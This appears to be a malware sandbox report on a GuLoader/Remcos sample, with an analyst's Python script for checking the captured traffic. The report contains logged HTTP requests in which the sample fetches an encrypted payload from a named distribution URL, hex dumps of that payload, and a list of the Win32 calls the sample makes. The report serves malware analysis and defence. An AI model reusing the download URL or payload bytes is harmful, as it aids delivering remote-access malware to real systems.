Data Ascii: oLv@H%Er~_V)EQ>-{Ry9$E"Jaeh2T\.m(F7S*J^;2C+w@IU)7#b9wvxWhV?YD>:d}?pW1*k{4\C2[p",#Y:5WgaNuAmB'0NYoWt
2024-11-13 07:18:55 UTC | 8000 | IN | Data Raw: 24 3f 74 58 8d 9b 39 93 c2 59 8e 8a 46 a4 b3 f0 58 a0 6b 98 a0 1f d5 1a cd ee 86 8b 8f 7a e2 08 ec fb c3 09 95 b8 80 cf f6 31 d0 7b b0 37 5d 36 20 ab c0 ab 69 fe f6 93 f2 28 4b 7c 1f b9 3a ce 6d bf 26 ff 23 c3 b5 86 eb 0d c8 4c 92 14 40 2d 63 50 2a c5 24 44 c5 43 88 67 80 a2 94 67 88 2f c0 43 05 6f ac 20 14 f7 21 44 69 2d 63 db b7 3e 5c ed 36 57 3f e8 fe 0a a6 fe c8 c1 e3 11 6d 11 b7 2d ef 85 22 a2 20 44 a4 f3 2e 69 6c f7 fb 6e ac 96 22 57 2e b7 b3 91 13 5e 64 83 56 d4 d5 c3 87 5e ef db fe 78 15 d6 e1 96 8a 43 5b 93 f2 80 40 b1 59 08 7a 86 ed 5c 46 1e c4 53 a6 50 4c 36 ab aa 99 63 80 1d bf 44 99 ab 23 5f 49 2a e9 b8 9e 07 4d ed 59 4d 23 98 7f 4f c7 c8 16 52 a7 fb 44 1d ce 13 27 c6 b9 7f e8 79 8a 9a ef 7f 87 db 90 fc e1 61 d4 f1 6d 0c e2 95 7c ee b0 9b 72
Data Ascii: $?tX9YFXkz1{7]6 i(K|:m&#L@-cP*$DCgg/Co !Di-c>\6W?m-" D.iln"W.^dV^xC[@Yz\FSPL6cD#_I*MYM#ORD'yam|r
2024-11-13 07:18:55 UTC | 8000 | IN | Data Raw: 7c 9d 8e 8c a2 fa 02 59 db 9b 7a 0a 60 9d a3 6d 87 9b fc 57 42 d2 a1 0c 89 6a c6 e4 9f e5 18 8b 55 c5 2d bc fd d1 04 09 49 8b 82 50 59 c2 f3 76 32 3a 2c 0c 5f f6 5d 0c eb 46 57 9a 71 e2 c6 8e f3 97 24 fb 20 84 b3 51 25 44 70 56 e3 d7 91 d3 5b de af 19 59 72 3e 82 bd 3b 67 b7 61 95 a4 5f 0c e9 cf d6 96 cd 54 4d 1d ad b2 83 17 9d e0 08 ec ee ee 06 e1 52 52 aa 2f 17 fa af f4 10 1f e8 0b 94 fa cd 51 8f 56 92 39 8c 56 33 b5 6b a0 a1 38 97 aa 96 f2 29 11 34 4f a4 1e 6a bd 9c f1 1d 02 3b 8d 78 04 f4 0f e2 9d 81 d1 13 33 4d 85 5c 4e 6c 11 44 08 67 cc 5f 88 12 d6 0b 74 c3 65 39 d1 8c e9 99 f7 33 70 c2 cf 34 25 2f 4d 5c 10 27 2b a1 7e 20 55 ae 20 cb 6e 5f 8d 98 6f 16 cb c6 02 ce b0 53 05 a0 f3 ed fc 9a 84 7e ed 37 52 11 f6 dd 4a 31 33 71 74 ad 81 76 ba e0 1d 80 ca
Data Ascii: |Yz`mWBjU-IPYv2:,_]FWq$ Q%DpV[Yr>;ga_TMRR/QV9V3k8)4Oj;x3M\NlDg_te93p4%/M\'+~ U n_oS~7RJ13qtv
2024-11-13 07:18:55 UTC | 8000 | IN | Data Raw: ef ab 50 94 0e 5b 95 be 90 21 0d 2b fe 76 03 37 e9 92 ba c3 a1 ce e0 be de 5f b6 0c cd 54 2b a2 0b ca 4b b1 14 9d a8 55 49 2d 4b 42 a5 5a 4f 2b 16 00 50 8d a6 3b df 6a 7a 96 35 fb aa 22 ec f4 dc b0 f2 dc a5 18 8c 08 ea f5 b1 4b ab 0f 83 05 2b dc c4 99 08 e1 cf 82 e7 42 fb 44 15 16 8a 19 a1 04 d1 f6 09 e3 b1 9b 58 8f fa 03 04 3d 80 b0 80 3f e4 cf 8b 57 ee 64 b5 53 ef 0a d5 81 58 44 b9 05 aa 36 ee cd 18 ef 11 e6 07 ee 96 c3 30 01 5d f6 ec 2c 35 dc d7 0f cc b0 24 6e 83 08 47 2b 82 1b e0 63 c1 46 56 07 12 74 6c b8 cc 87 34 e6 cc 82 39 a5 39 95 5d a5 7f 4a fa 5e e6 2e c6 c2 cf 5b 31 b8 9a 19 df 4f af 95 78 c9 64 ea 54 1b 97 6c 40 06 a9 db 88 31 59 d3 ad d8 4b c7 75 0d 0e ad a5 03 26 18 8c 40 ac 53 ae ce c6 24 6d ca d2 2b 53 21 b9 cb 54 ef 32 7f b9 e6 6e d1 63
Data Ascii: P[!+v7_T+KUI-KBZO+P;jz5"K+BDX=?WdSXD60],5$nG+cFVtl499]J^.[1OxdTl@1YKu&@S$m+S!T2nc
2024-11-13 07:18:55 UTC | 8000 | IN | Data Raw: 63 a6 fb 41 24 41 02 12 7c 11 9d d4 8f 78 55 2c bd 1c b1 1a c7 59 9e ae 3b 4f 8c 96 7f d3 ad f3 3b 44 e1 7f d6 7e 8d 71 44 92 a4 56 39 9c 81 86 a7 b9 82 cf c1 00 64 f6 ca 9a 8c ea 81 f4 af 42 63 7e a1 67 d4 73 93 27 6e d0 78 7d 3f ea 22 b6 52 fa 61 76 61 92 30 7e 96 4a 9a be c8 85 d0 84 99 01 d9 31 39 b0 3b 99 ed d3 63 ce c1 5d b5 1b d0 42 ed 85 69 37 b5 f5 fd de f2 c8 54 8a 88 c5 8f 9d 96 24 16 e9 f8 27 76 a1 9c 60 f0 15 f9 7e cb 03 a1 c6 47 ca 2c 5a 22 21 83 a5 de 3c d9 72 af b9 76 3e 6a 14 d3 20 b0 69 35 84 cf ea ea a8 bf 0f d2 11 1d ab 47 6e d6 d1 70 39 e7 ff 24 eb 49 67 e1 cc b2 ea d2 30 4e f1 cb 13 e7 da 22 f5 00 1f 0e 64 96 5a 61 8d d7 fb 81 95 41 34 b8 c9 98 2c bb 40 98 31 3c 07 72 00 60 cd f8 06 60 f3 59 08 d8 31 a6 75 53 b9 f0 21 7f 69 8c 37 ed
Data Ascii: cA$A|xU,Y;O;D~qDV9dBc~gs'nx}?"Rava0~J19;c]Bi7T$'v`~G,Z"!<rv>j i5Gnp9$Ig0N"dZaA4,@1<r``Y1uS!i7
2024-11-13 07:18:55 UTC | 8000 | IN | Data Raw: 46 d5 33 4c 15 4b ef 3a 06 45 a9 4a 81 c4 9e 1a bf 06 d3 c3 a7 4e b4 c4 1f 21 32 7c 6d 29 02 55 47 b5 6f a0 39 f1 2f c3 6f 36 c2 34 f6 a6 b7 b0 bf 19 d7 46 be 02 92 3e 5d c6 b6 9c aa 58 18 62 3b 46 e9 af b8 d7 35 16 d3 d0 ef 4e 31 34 ca a6 be 57 05 4e f5 a2 77 e3 a2 0b 22 19 83 78 b8 fd 81 4a e4 60 47 b9 61 6f a4 2f 35 6b d4 b0 f9 fe 9d dd 61 54 1f 15 4e 79 2d 7d 11 14 2e 72 36 f0 57 2f b4 57 7d 1c 78 a0 b6 ff 4c 39 06 1d 3c ef 04 d8 ba 5b c3 8f d9 e8 f6 8a ad 81 0f 42 1f 9f 5b cb 04 b0 9e a7 2d 34 06 98 82 37 79 c8 97 1d 10 35 ae d8 31 0a 44 f2 2d dd 29 95 6f 73 f6 0a 99 06 30 c0 00 af 50 7e 57 a8 c6 0f be 40 15 92 8c bd 8f 83 99 b9 86 7f d4 b5 c4 01 fb 1b 2f a8 75 c9 96 9f 0b c7 9b 98 84 75 5e db e2 e3 09 2c 80 e6 af e1 52 bd c9 ef 25 e2 5c fe 9e 25 c2
Data Ascii: F3LK:EJN!2|m)UGo9/o64F>]Xb;F5N14WNw"xJ`Gao/5kaTNy-}.r6W/W}xL9<[B[-47y51D-)os0P~W@/uu^,R%\%
2024-11-13 07:18:55 UTC | 8000 | IN | Data Raw: 2e 75 6a 15 81 ce cd 38 15 85 19 03 31 6c 91 af 61 b3 99 9c a2 6f 3e 91 d0 3c 6a df ef 9e 19 41 9c d3 b5 59 dd 27 9c 44 a5 46 a4 1e 0f 9b f9 8c ec f2 91 cb 89 94 41 e7 00 e1 fc 51 a0 0b a3 4a 7f 3a d9 28 f1 7b 91 c8 f8 f8 1c 6f 41 c7 cd c3 2e 98 a2 49 fe d7 0e 99 fa a4 13 37 16 47 d8 01 bf f2 f6 af 2f 32 1f e0 52 26 f3 ce 99 43 07 e3 25 53 b1 cc 42 8c 31 64 ff 8c 59 54 5b 7c 67 03 f9 7e f0 7b cb 3f b4 3c 29 b3 90 cb 08 d2 16 ca 71 b8 9b 24 fe 97 c3 d1 41 f9 2e 10 10 6d 12 f2 6a 92 ad 59 b2 4a 9b 1a cf 4c 93 dd 51 f9 1d fc 42 35 3c 8f 92 17 fb 93 96 b4 55 b2 52 04 e2 34 fc e6 69 91 6e 26 0f fb 79 ed 84 06 22 98 2e 2d 00 a7 cb f1 a4 bd e1 02 bf e1 df 65 e9 83 cc ee d1 37 24 5e 65 cf cd 29 dc 00 c3 81 69 7b 26 11 4d f5 fe 4a 59 68 c6 4b fd 31 fe c0 10 b5 10
Data Ascii: .uj81lao><jAY'DFAQJ:({oA.I7G/2R&C%SB1dYT[|g~{?<)q$A.mjYJLQB5<UR4in&y".-e7$^e)i{&MJYhK1
2024-11-13 07:18:55 UTC | 8000 | IN | Data Raw: 8b 91 ab 75 ff c1 b4 d5 2d 2b e8 d2 ee 36 29 70 20 41 8d 0a e3 ad 81 7d e6 70 f2 4c 3e 45 c4 b1 a7 2c c0 de a1 bd d1 79 6e 91 81 b9 60 fe 66 1d 94 44 52 2a be 64 83 0c 7e 94 ae 62 f9 4a 57 9b 96 bc ea 6b be bf bd 91 57 c7 86 8c b5 d8 0d 28 65 bb 43 b1 e5 83 3d 3f 5c d1 fb e0 3b 96 62 96 e1 21 67 3a 38 dd 17 dd 5c 22 43 87 4a db d5 66 cd 0c 8b 8c bb b4 43 38 14 3e 06 b5 ef 66 8c d8 08 4f c0 11 fc 43 70 10 ca 51 29 19 7f 46 47 60 01 3a 95 23 bd 4e 31 b4 76 ae ee 27 f6 0c 1f db 4a 9f 69 1b 9b fa d7 5c c7 2a 70 3f 44 f4 3f af 12 fe 27 ec 80 92 db 12 56 9c 6a 5e 7e ab 5c 81 f8 9d d1 b9 15 c8 34 62 3f 7b 75 76 1b db b4 db 06 c5 d8 24 52 df 87 ec 2c d1 8b 80 1d e1 2f b9 29 5c 49 a6 87 bf 51 06 8b 30 76 95 b2 56 69 4a 7f e2 fc 12 61 22 d7 3a b1 78 07 0b 94 c0 35
Data Ascii: u-+6)p A}pL>E,yn`fDR*d~bJWkW(eC=?\;b!g:8\"CJfC8>fOCpQ)FG`:#N1v'Ji\*p?D?'Vj^~\4b?{uv$R,/)\IQ0vViJa":x5
2024-11-13 07:18:56 UTC | 8000 | IN | Data Raw: b4 44 96 6a b4 6b 77 e0 a0 d8 40 8a e0 39 05 fc a5 69 8f e2 38 d9 6e c6 a9 fe 01 15 52 85 95 f7 39 e2 da cd ce 52 c1 00 91 04 71 c4 11 36 8e c0 7f 3d 17 b2 54 ab a7 3e 58 a5 34 79 76 4a 40 2d 67 3a 46 29 9f 75 2e cf dc da 7d 3a f1 cb 91 64 32 d1 fe c5 34 88 91 04 82 33 9b 90 ec b3 e7 70 12 39 48 58 84 35 df 4c f2 da 34 90 de e4 de 6f 54 18 4c 35 d8 13 c8 14 dd 5c e0 1f c3 91 a3 60 cd a9 03 b5 ad 58 2a 7b 44 70 f1 4d e1 83 db 99 ef d6 83 05 f4 4c f9 3a de cd 82 ee 87 03 8f 7c 09 45 fc 7c d8 1f 9d 8f 09 90 ea 4b 41 a7 17 44 6f 2a b7 3f 61 85 ab d1 e5 17 00 cf 6b aa 3b e5 d7 df 93 f5 2b e5 4c 32 aa 85 2f e2 a7 96 e3 e9 be 09 14 63 65 16 3f ee 40 28 cc 9c 95 9f 8f ec cc a2 53 fa 89 cc 45 83 b1 9b 75 09 c9 23 4d 7a 68 40 5a 80 4a 2b 45 54 45 24 25 e1 77 09 f3
Data Ascii: Djkw@9i8nR9Rq6=T>X4yvJ@-g:F)u.}:d243p9HX5L4oTL5\`X*{DpML:|E|KADo*?ak;+L2/ce?@(SEu#Mzh@ZJ+ETE$%w
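The two exchanges above show the sample (PID 1076, the IMG...Bjlkeloftet.exe process from the session table) fetching /zjMSeQNkb41.bin with a Firefox User-Agent, being redirected from port 80 to HTTPS, and then receiving a 493120-byte application/octet-stream body whose first bytes (9d 62 7b 63 ...) are not a PE header. The Python below is an added example, not code from the report or from the sample's authors: it parses this transcript format, pairs each request with its response and applies the checks an analyst runs on a loader download: User-Agent versus originating process, redirect target scheme, Content-Length versus bytes actually captured, and PE-header and byte-entropy tests on the body. The transcript is copied from the page and cut down to the first displayed body chunk of the download; the process name comes from the session table; the 6.5 bits/byte threshold and the function names are assumptions of mine.

```python
import math
import re
from collections import Counter

# Constructed sample: the two HTTP exchanges copied from this page. The first response
# body is the complete 241-byte redirect page; of the second only the first displayed
# chunk of the 493120-byte download is kept, so the capture is shorter than Content-Length.
HTTP_DUMP = """
Nov 13, 2024 08:18:53.120764017 CET169OUTGET /zjMSeQNkb41.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Host: bdias.com
Cache-Control: no-cache
Nov 13, 2024 08:18:54.016949892 CET439INHTTP/1.1 301 Moved Permanently
Date: Wed, 13 Nov 2024 07:18:53 GMT
Server: Apache
Location: https://bdias.com/zjMSeQNkb41.bin
Content-Length: 241
Content-Type: text/html; charset=iso-8859-1
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 64 69 61 73 2e 63 6f 6d 2f 7a 6a 4d 53 65 51 4e 6b 62 34 31 2e 62 69 6e 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
2024-11-13 07:18:55 UTC193OUTGET /zjMSeQNkb41.bin HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Cache-Control: no-cache
Host: bdias.com
Connection: Keep-Alive
2024-11-13 07:18:55 UTC286INHTTP/1.1 200 OK
Date: Wed, 13 Nov 2024 07:18:55 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, close
Last-Modified: Tue, 12 Nov 2024 11:10:05 GMT
ETag: "bb407b4-78640-626b54264a89c"
Accept-Ranges: bytes
Content-Length: 493120
Content-Type: application/octet-stream
2024-11-13 07:18:55 UTC7906INData Raw: 9d 62 7b 63 9f ea 7f d5 06 90 9d 76 93 4d 82 ac e6 f3 50 b2 34 7b b0 ce 2b dd 4f ab bc 76 09 b8 8f f4 55 b6 66 96 a7 01 1c 29 fc 90 cf 13 00 a2 62 3f bb 43 91 6b 2b 75 95 f8 ef e9 f3 5f c1 59 ef f8 23 04 ae 69 fc 04 c0 a0 08 95 17 f4 1a 7d 47 38 f6 b2 37 5d b5 cc ff 4b 67 01 aa a2 d5 f2 c0 0d a9 e0 46 d2 af 31 be 26 7c e7 f3 38 ca cf 2d 20 f5 46 eb bf eb 66 74 6c 82 24 4c fd 7e 94 2f d8 18 ee 29 bc 1b 28 24 fa 6e e0 99 70 2e 0d 09 0a 5d ec bc 04 2b 6b 8c d8 9b 44 04 dc 40 f1 01 3f 28 72 d9 fd 06 d8 0d d6 60 d7 6d a1 ff b4 9c 41 0d 8a 35 e2 e8 6a da 76 03 68 b7 5b 78 c7 5d b2 dc f6 30 9c 1a f3 22 97 8f 45 e4 7d e7 4a 4e a1 94 2f 1d 9a 1f f0 bd 8d 92 8c 53 a0 a0 f7 55 10 79 d8 cb 18 a9 1b 1b 42 3c 45 64 a8 c3 33 0e 0f 6d 7c 94 a1 37 e2 1c ed 4f f3 cb 1f 1c
"""
SAMPLE_PROCESS = "IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"  # PID 1076 in the session table

# A record starts with a timestamp (either form used on the page), then byte count and direction fused.
MSG_RE = re.compile(r"^(?:\d{4}-\d\d-\d\d \d\d:\d\d:\d\d UTC|\w{3} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d+ CET)"
                    r"(\d+)(IN|OUT)(.*)$")

def parse_dump(text):
    """Split a transcript into messages: direction, start line, headers, body bytes."""
    msgs = []
    for line in text.strip().splitlines():
        m = MSG_RE.match(line)
        payload = m.group(3) if m else line
        if m and not payload.startswith("Data Raw:"):          # new request or response
            msgs.append({"dir": m.group(2), "start": payload, "headers": {}, "body": b""})
        elif payload.startswith("Data Raw:"):                   # body chunk for the current message
            msgs[-1]["body"] += bytes.fromhex(payload[len("Data Raw:"):])
        elif ": " in payload and not payload.startswith("Data Ascii:"):
            name, _, value = payload.partition(": ")
            msgs[-1]["headers"][name.lower()] = value
    return msgs

def entropy(data):
    """Shannon entropy in bits per byte: near 8 for encrypted or compressed data, 4 to 5 for text."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def assess(text, process_name):
    """Pair each request with its response and flag what an analyst would note."""
    msgs = parse_dump(text)
    findings = []
    for req, res in zip(msgs, msgs[1:]):
        if req["dir"] != "OUT" or res["dir"] != "IN":
            continue
        status = int(res["start"].split()[1])
        f = {"url": req["headers"].get("host", "") + req["start"].split()[1], "status": status, "flags": [],
             "declared_length": int(res["headers"].get("content-length", 0)),
             "captured_length": len(res["body"])}
        if "Firefox/" in req["headers"].get("user-agent", "") and "firefox" not in process_name.lower():
            f["flags"].append("browser User-Agent sent by non-browser process " + process_name)
        if status in (301, 302, 307, 308) and res["headers"].get("location", "").startswith("https://"):
            f["flags"].append("redirected to HTTPS; look for the follow-up request on 443")
        if status == 200 and res["headers"].get("content-type", "").startswith("application/octet-stream"):
            f["pe_header"] = res["body"][:2] == b"MZ"
            f["entropy"] = round(entropy(res["body"]), 2)
            if not f["pe_header"] and f["entropy"] > 6.5:   # threshold is an assumption
                f["flags"].append("high-entropy body without a PE header (encoded stage, not a raw executable)")
        if f["captured_length"] < f["declared_length"]:
            f["flags"].append("capture shorter than Content-Length")
        findings.append(f)
    return findings
```

Running `assess(HTTP_DUMP, SAMPLE_PROCESS)` yields one finding per exchange: the 301 whose 241-byte body matches its Content-Length and whose Location moves the fetch to HTTPS, and the 200 whose body is a high-entropy blob with no MZ header and far fewer captured bytes than the 493120 declared. The first flag fires on both, because the sample uses a Firefox User-Agent while the request comes from an .exe on the desktop.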



                                      Target ID:0
                                      Start time:02:17:55
                                      Start date:13/11/2024
                                      Path:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"
                                      Imagebase:0x400000
                                      File size:731'660 bytes
                                      MD5 hash:A03DCB82D6ECAAB34CC6AE971A806C06
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2056638671.000000000433E000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:true

                                      Target ID:4
                                      Start time:02:18:38
                                      Start date:13/11/2024
                                      Path:C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\IMG635673567357735773573757875883587935775753Bjlkeloftet.exe"
                                      Imagebase:0x400000
                                      File size:731'660 bytes
                                      MD5 hash:A03DCB82D6ECAAB34CC6AE971A806C06
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2910026299.00000000354EE000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2890396068.0000000004ED8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2890396068.0000000004F17000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2890485500.0000000004F49000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:low
                                      Has exited:false


                                        Execution Graph

                                        Execution Coverage:21.3%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:16.2%
                                        Total number of Nodes:1541
                                        Total number of Limit Nodes:39
[Execution graph node/edge listing: rendered graph data, not reproduced here; the page's copy is cut off mid-listing. Nodes are function start addresses in the sample (0x401xxx to 0x406xxx) and in a module mapped at 0x6e33xxxx, each annotated with the Win32 APIs it calls. APIs named in the listing: VirtualProtect, VirtualAlloc, SetFileAttributesA, RegOpenKeyExA, RegQueryValueExA, RegCloseKey, ExpandEnvironmentStringsA, lstrcmpA, SearchPathA, GetDlgItem, SendMessageA, InvalidateRect, IsWindowVisible, CallWindowProcA, GetMessagePos, ScreenToClient, WritePrivateProfileStringA, GetModuleHandleA, LoadLibraryA, LoadLibraryExA, GetProcAddress, FreeLibrary, GlobalAlloc, GlobalFree, GlobalSize, lstrcpyA, lstrcpynA, lstrlenA, wsprintfA, MultiByteToWideChar, WideCharToMultiByte, CLSIDFromString, StringFromGUID2, EnumWindows, GetLastError, SetTimer, MulDiv, SetWindowTextA, SetDlgItemTextA. Several helper nodes are summarised only as "21 API calls" or "28 API calls".]
calls 4329->4330 4332 40245c 4330->4332 4333 402487 4331->4333 4334 402466 4332->4334 4338 402494 4332->4338 4339 402d1c 4333->4339 4336 402c5e 21 API calls 4334->4336 4337 40246d RegDeleteValueA RegCloseKey 4336->4337 4337->4338 4340 402d28 4339->4340 4341 402d2f 4339->4341 4340->4338 4341->4340 4343 402d60 4341->4343 4344 406113 RegOpenKeyExA 4343->4344 4345 402d8e 4344->4345 4346 402d9e RegEnumValueA 4345->4346 4353 402e38 4345->4353 4355 402dc1 4345->4355 4347 402e28 RegCloseKey 4346->4347 4346->4355 4347->4353 4348 402dfd RegEnumKeyA 4349 402e06 RegCloseKey 4348->4349 4348->4355 4350 4066b5 5 API calls 4349->4350 4352 402e16 4350->4352 4351 402d60 6 API calls 4351->4355 4352->4353 4354 402e1a RegDeleteKeyA 4352->4354 4353->4340 4354->4353 4355->4347 4355->4348 4355->4349 4355->4351 5036 6e33103d 5039 6e33101b 5036->5039 5046 6e33154b 5039->5046 5041 6e331020 5042 6e331027 GlobalAlloc 5041->5042 5043 6e331024 5041->5043 5042->5043 5044 6e331572 3 API calls 5043->5044 5045 6e33103b 5044->5045 5047 6e331551 5046->5047 5048 6e331557 5047->5048 5049 6e331563 GlobalFree 5047->5049 5048->5041 5049->5041 5050 4027cf 5051 402c5e 21 API calls 5050->5051 5052 4027d6 FindFirstFileA 5051->5052 5053 4027f9 5052->5053 5057 4027e9 5052->5057 5058 4061eb wsprintfA 5053->5058 5055 402800 5059 40628d lstrcpynA 5055->5059 5058->5055 5059->5057 4439 401c53 4440 402c3c 21 API calls 4439->4440 4441 401c5a 4440->4441 4442 402c3c 21 API calls 4441->4442 4443 401c67 4442->4443 4444 401c7c 4443->4444 4445 402c5e 21 API calls 4443->4445 4446 401c8c 4444->4446 4447 402c5e 21 API calls 4444->4447 4445->4444 4448 401ce3 4446->4448 4449 401c97 4446->4449 4447->4446 4450 402c5e 21 API calls 4448->4450 4451 402c3c 21 API calls 4449->4451 4452 401ce8 4450->4452 4453 401c9c 4451->4453 4454 402c5e 21 API calls 4452->4454 4455 402c3c 21 API calls 4453->4455 4456 401cf1 FindWindowExA 4454->4456 4457 401ca8 4455->4457 4460 401d0f 4456->4460 4458 401cd3 SendMessageA 4457->4458 4459 401cb5 
SendMessageTimeoutA 4457->4459 4458->4460 4459->4460 4461 402653 4462 402658 4461->4462 4463 40266c 4461->4463 4465 402c3c 21 API calls 4462->4465 4464 402c5e 21 API calls 4463->4464 4466 402673 lstrlenA 4464->4466 4467 402661 4465->4467 4466->4467 4468 405ec7 WriteFile 4467->4468 4469 402695 4467->4469 4468->4469 5060 403a54 5061 403a5f 5060->5061 5062 403a63 5061->5062 5063 403a66 GlobalAlloc 5061->5063 5063->5062 4557 4014d6 4558 402c3c 21 API calls 4557->4558 4559 4014dc Sleep 4558->4559 4561 402aea 4559->4561 4562 401957 4563 401959 4562->4563 4564 402c5e 21 API calls 4563->4564 4565 40195e 4564->4565 4568 405a4f 4565->4568 4605 405d0d 4568->4605 4571 405a77 DeleteFileA 4575 401967 4571->4575 4572 405a8e 4584 405bbc 4572->4584 4619 40628d lstrcpynA 4572->4619 4574 405ab4 4576 405ac7 4574->4576 4577 405aba lstrcatA 4574->4577 4629 405c66 lstrlenA 4576->4629 4579 405acd 4577->4579 4581 405adb lstrcatA 4579->4581 4583 405ae6 lstrlenA FindFirstFileA 4579->4583 4581->4583 4583->4584 4603 405b0a 4583->4603 4584->4575 4637 406620 FindFirstFileA 4584->4637 4586 405c4a CharNextA 4586->4603 4588 405a07 5 API calls 4589 405bf6 4588->4589 4590 405c10 4589->4590 4591 405bfa 4589->4591 4592 4053d1 28 API calls 4590->4592 4591->4575 4596 4053d1 28 API calls 4591->4596 4592->4575 4593 405b9b FindNextFileA 4595 405bb3 FindClose 4593->4595 4593->4603 4595->4584 4597 405c07 4596->4597 4598 406066 40 API calls 4597->4598 4598->4575 4600 405a4f 64 API calls 4600->4603 4601 4053d1 28 API calls 4601->4593 4602 4053d1 28 API calls 4602->4603 4603->4586 4603->4593 4603->4600 4603->4601 4603->4602 4620 40628d lstrcpynA 4603->4620 4621 405a07 4603->4621 4633 406066 MoveFileExA 4603->4633 4643 40628d lstrcpynA 4605->4643 4607 405d1e 4608 405cb8 4 API calls 4607->4608 4609 405d24 4608->4609 4610 405a6f 4609->4610 4611 406587 5 API calls 4609->4611 4610->4571 4610->4572 4617 405d34 4611->4617 4612 405d5f lstrlenA 4613 405d6a 4612->4613 4612->4617 4614 405c1f 3 API calls 4613->4614 4616 
405d6f GetFileAttributesA 4614->4616 4615 406620 2 API calls 4615->4617 4616->4610 4617->4610 4617->4612 4617->4615 4618 405c66 2 API calls 4617->4618 4618->4612 4619->4574 4620->4603 4644 405dfb GetFileAttributesA 4621->4644 4624 405a34 4624->4603 4625 405a22 RemoveDirectoryA 4627 405a30 4625->4627 4626 405a2a DeleteFileA 4626->4627 4627->4624 4628 405a40 SetFileAttributesA 4627->4628 4628->4624 4630 405c73 4629->4630 4631 405c84 4630->4631 4632 405c78 CharPrevA 4630->4632 4631->4579 4632->4630 4632->4631 4634 40607a 4633->4634 4636 406087 4633->4636 4647 405ef6 4634->4647 4636->4603 4638 406636 FindClose 4637->4638 4639 405be0 4637->4639 4638->4639 4639->4575 4640 405c1f lstrlenA CharPrevA 4639->4640 4641 405bea 4640->4641 4642 405c39 lstrcatA 4640->4642 4641->4588 4642->4641 4643->4607 4645 405a13 4644->4645 4646 405e0d SetFileAttributesA 4644->4646 4645->4624 4645->4625 4645->4626 4646->4645 4648 405f42 GetShortPathNameA 4647->4648 4649 405f1c 4647->4649 4651 406061 4648->4651 4652 405f57 4648->4652 4674 405e20 GetFileAttributesA CreateFileA 4649->4674 4651->4636 4652->4651 4654 405f5f wsprintfA 4652->4654 4653 405f26 CloseHandle GetShortPathNameA 4653->4651 4655 405f3a 4653->4655 4656 406320 21 API calls 4654->4656 4655->4648 4655->4651 4657 405f87 4656->4657 4675 405e20 GetFileAttributesA CreateFileA 4657->4675 4659 405f94 4659->4651 4660 405fa3 GetFileSize GlobalAlloc 4659->4660 4661 405fc5 4660->4661 4662 40605a CloseHandle 4660->4662 4663 405e98 ReadFile 4661->4663 4662->4651 4664 405fcd 4663->4664 4664->4662 4676 405d85 lstrlenA 4664->4676 4667 405fe4 lstrcpyA 4670 406006 4667->4670 4668 405ff8 4669 405d85 4 API calls 4668->4669 4669->4670 4671 40603d SetFilePointer 4670->4671 4672 405ec7 WriteFile 4671->4672 4673 406053 GlobalFree 4672->4673 4673->4662 4674->4653 4675->4659 4677 405dc6 lstrlenA 4676->4677 4678 405d9f lstrcmpiA 4677->4678 4679 405dce 4677->4679 4678->4679 4680 405dbd CharNextA 4678->4680 4679->4667 4679->4668 4680->4677 4681 4033d8 
